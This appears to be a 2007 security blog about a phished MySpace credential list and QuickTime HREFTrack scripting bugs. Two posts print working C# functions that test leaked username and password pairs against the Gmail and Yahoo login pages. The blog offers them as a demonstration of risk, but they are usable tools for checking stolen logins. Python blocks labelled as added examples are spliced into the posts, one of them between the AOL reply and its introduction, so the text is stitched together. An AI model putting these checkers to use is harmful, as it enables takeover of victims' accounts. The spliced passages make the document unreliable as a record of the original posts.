If at first you don't succeed; call it version 1.0
Friday, January 26, 2007

Almost two weeks after I sent the first mails, and after sending two more follow-up mails asking whether there were any updates regarding this issue, I have received only one more response, from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use: “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to any law school, but from what I can understand from the first line of the terms, these “terms of use” apply only to registered Gmail users. So, if an attacker brute-forces the MySpace phishing list, finds a valid Gmail username/password and uses it, he will not be violating these terms, because he has not registered for that account and therefore does not need to read or agree to them. I’ve sent this comment to Google.

I'm still waiting for a response from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers' list, the following is a modified version of the Gmail account validator, this time for Yahoo! Mail:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
                 ".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
                 "&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login=" +
                 username + "&passwd=" + password + "&.save=Sign+In";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.replace") > -1) ? 1 : (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1) ? 0 : -1;
}


Friday, January 26, 2007 3:15:30 PM UTC | Comments [0] | .NET | Security
Tuesday, January 16, 2007

Yesterday, a huge list of MySpace accounts’ usernames and passwords was revealed to the public. This list was harvested by phishers.
Most of those MySpace usernames are email addresses at the following webmail services: GMAIL, Hotmail, Yahoo! Mail and AOL.
Some of those poor MySpace users are probably using the same password for their MySpace account and their webmail account, and probably for other web services too (eBay, Amazon, etc.).
Brute forcing those web services to extract the valid credentials from the phishers' list is very easy. So, I’ve decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to check the phishers' list against their own databases, in order to warn the poor users to change their passwords as soon as possible.
Over 21 hours later, only AOL has responded to my suggestion/request.
AOL's response (10 minutes after I sent the mail!):
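What the vendor-side check asked for above could look like, as an added example that is not the post's code and not any vendor's: it takes the leaked email:password lines, looks up only addresses in the vendor's own domains, and compares each leaked password against the stored salted hash, so that the matching accounts can be forced to reset before anyone else tries the same pairs. The store layout, the PBKDF2 parameters, the domain set and the sample data are all constructed assumptions.

```python
import hashlib
import hmac
import os

# Hypothetical vendor-side check (added example, not the post's code): test the
# leaked "email:password" pairs against our own password store and return the
# accounts whose password is reused, so they can be forced to reset.

PBKDF2_ITERATIONS = 100_000  # assumed work factor for this example


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the store never holds plaintext passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def make_user_record(password: str) -> dict:
    """Build one store entry (constructed layout: per-user salt plus hash)."""
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


def parse_leak(lines):
    """Yield (email, password) from 'email:password' lines, skipping malformed
    ones. Passwords may contain ':', so split only on the first colon."""
    for raw in lines:
        line = raw.strip()
        if not line or ":" not in line:
            continue
        email, password = line.split(":", 1)
        email = email.strip().lower()  # addresses are compared case-insensitively
        if "@" not in email or not password:
            continue
        yield email, password


def find_reused_credentials(leak_lines, user_store, our_domains):
    """Return the sorted list of our users whose leaked password is also their
    password with us. Addresses outside our domains are never looked up."""
    matches = set()
    for email, password in parse_leak(leak_lines):
        domain = email.rsplit("@", 1)[1]
        if domain not in our_domains:
            continue
        record = user_store.get(email)
        if record is None:
            continue  # leaked address is not an account here
        candidate = hash_password(password, record["salt"])
        if hmac.compare_digest(candidate, record["hash"]):
            matches.add(email)
    return sorted(matches)


# Constructed sample data: a tiny password store and a few leaked lines.
SAMPLE_STORE = {
    "alice@mail.example": make_user_record("Tr0ub4dor&3"),
    "bob@mail.example": make_user_record("correct horse battery staple"),
    "carol@mail.example": make_user_record("different-everywhere"),
}
SAMPLE_LEAK = [
    "alice@mail.example:Tr0ub4dor&3",            # same password on both services
    "bob@mail.example:hunter2",                   # different password: no match
    "Carol@Mail.Example:different-everywhere",    # address differs only in case
    "dave@other.example:whatever",                # not our domain: never looked up
    "garbage line without colon",                 # malformed: skipped
    "",
]


def demo():
    """Run the check on the constructed data; returns ['alice@...', 'carol@...']."""
    return find_reused_credentials(SAMPLE_LEAK, SAMPLE_STORE, {"mail.example"})


if __name__ == "__main__":
    for email in demo():
        print(f"force password reset and notify: {email}")
```

The comparison is done on the vendor's side against its own hashes, which is the point of the request: nobody has to log in as the user to learn that the password is reused, and the result feeds a forced reset rather than a list of working logins.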


Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities


Just to demonstrate how easy it is to extract valid username/password pairs from the phishers' list, the following are 20 lines of C# code which validate the username and password of a GMAIL account:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidGmailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://www.google.com/accounts/ServiceLogin";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = "?service=mail&Email=" + username + "&Passwd=" + password + "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.href") > -1) ? 1 : (resp.IndexOf("<form action=\"LoginAuth\"") > -1) ? 0 : -1;
}


Tuesday, January 16, 2007 7:04:06 PM UTC | Comments [1] | .NET | Security
Friday, January 05, 2007

As I’ve already mentioned in the third "Month of Apple Bugs" advisory, the QuickTime HREFTrack feature, which was exploited in the last MySpace worm, is vulnerable to cross-zone scripting attacks.
Landon Fuller, who has decided to publish fixes for the bugs disclosed in the "Month of Apple Bugs", provided a fix for this vulnerability a few hours after the advisory was published.
That fix, which blocked references to the javascript protocol handler from the HREFTrack attribute, was aimed at the cross-site scripting vulnerability. That one was previously disclosed by pdp and was exploited in the MySpace worm. The cross-zone scripting issue I disclosed in MoAB #3 is a different vulnerability, and although Landon's fix was better than the fix Apple provided (which probably only prevented the MySpace worm), it didn’t fix MoAB #3.

Today, after exchanging mails with Landon Fuller, he published a new version of this fix. This time, instead of black-listing the javascript protocol handler, he white-listed only the protocol handlers that were supposed to be referenced in the HREFTrack attribute (http, https and ftp).
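The difference between the two fixes is the classic deny-list versus allow-list choice. The following is an added example in Python, not Landon Fuller's patch and not Apple's code, showing both policies applied to a URL of the kind an HREFTrack attribute hands to the browser: only the three schemes the post names are accepted by the allow-list, while the deny-list refuses nothing but a literal javascript: prefix. The two checker functions and the sample URLs are constructed for the comparison.

```python
from urllib.parse import urlsplit

# Added example (not Landon Fuller's patch): deny-list vs. allow-list handling
# of the URL an HREFTrack attribute would hand to the browser.

# The three handlers the post says the attribute was meant to reference.
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def scheme_of(url: str) -> str:
    """Scheme the way a URL consumer reads it: surrounding whitespace dropped,
    case folded. Empty string when the URL has no scheme at all."""
    return urlsplit(url.strip()).scheme.lower()


def denylist_allows(url: str) -> bool:
    """First-fix style: refuse only a literal 'javascript:' prefix and pass
    everything else through. Any other scheme, or the same scheme spelled
    differently, is not caught."""
    return not url.startswith("javascript:")


def allowlist_allows(url: str) -> bool:
    """Second-fix style: the scheme must be one of the expected handlers;
    everything else, including schemeless strings, is refused."""
    return scheme_of(url) in ALLOWED_SCHEMES


# Constructed sample inputs covering the cases a validator must get right.
SAMPLE_URLS = [
    "http://example.com/track",
    "HTTPS://example.com/track",
    "ftp://example.com/file",
    "javascript:alert(1)",
    "JavaScript:alert(1)",
    "  javascript:alert(1)",
    "file:///local/path",
    "example.com/no-scheme",
]


def disagreements(urls=SAMPLE_URLS):
    """URLs the deny-list lets through but the allow-list refuses."""
    return [u for u in urls if denylist_allows(u) and not allowlist_allows(u)]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{u!r:28} deny-list={denylist_allows(u)!s:5} allow-list={allowlist_allows(u)}")
```

The allow-list wins not because it knows more bad schemes but because it does not have to: anything that is not http, https or ftp is refused without the validator ever having seen it before, which is exactly why the updated fix closes the cross-zone case the first one missed.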

This updated fix, although it seems to be only for Macintosh users, should prevent exploitation of this issue on that platform. Good job, Landon!
We’ll now have to wait for an official cross-platform fix from Apple, or maybe a cross-platform “Month of Apple Fixes” initiative.

P.S.
This fix patches the rNPN_GetURL() function. If this patch is global for both the QuickTime plug-in and the QuickTime player, it should also prevent exploitation of the .qtl cross-zone scripting vulnerability that was also previously disclosed by pdp.


Friday, January 05, 2007 10:02:51 AM UTC | Comments [5] | Security
Wednesday, January 03, 2007

A month ago, a vulnerability in QuickTime was exploited to spread a worm on MySpace. The vulnerability was first published by pdp. In his article, pdp describes how the HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability as a cross-site scripting attack vector.

This MoAB issue shows that the same vulnerability can also be used in a cross-zone scripting attack, which could, in combination with other vulnerabilities, allow remote execution of arbitrary code on the user's machine as well as disclosure of the filesystem contents.

Proof-of-Concept code and more information can be found at MoAB #3.


Wednesday, January 03, 2007 10:38:19 PM UTC | Comments [2] | Security
Monday, January 01, 2007

Happy new year! "Month of Apple Bugs" is here!

Enjoy the first vulnerability: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow.

More to come...


Monday, January 01, 2007 6:59:39 PM UTC | Comments [1] | Security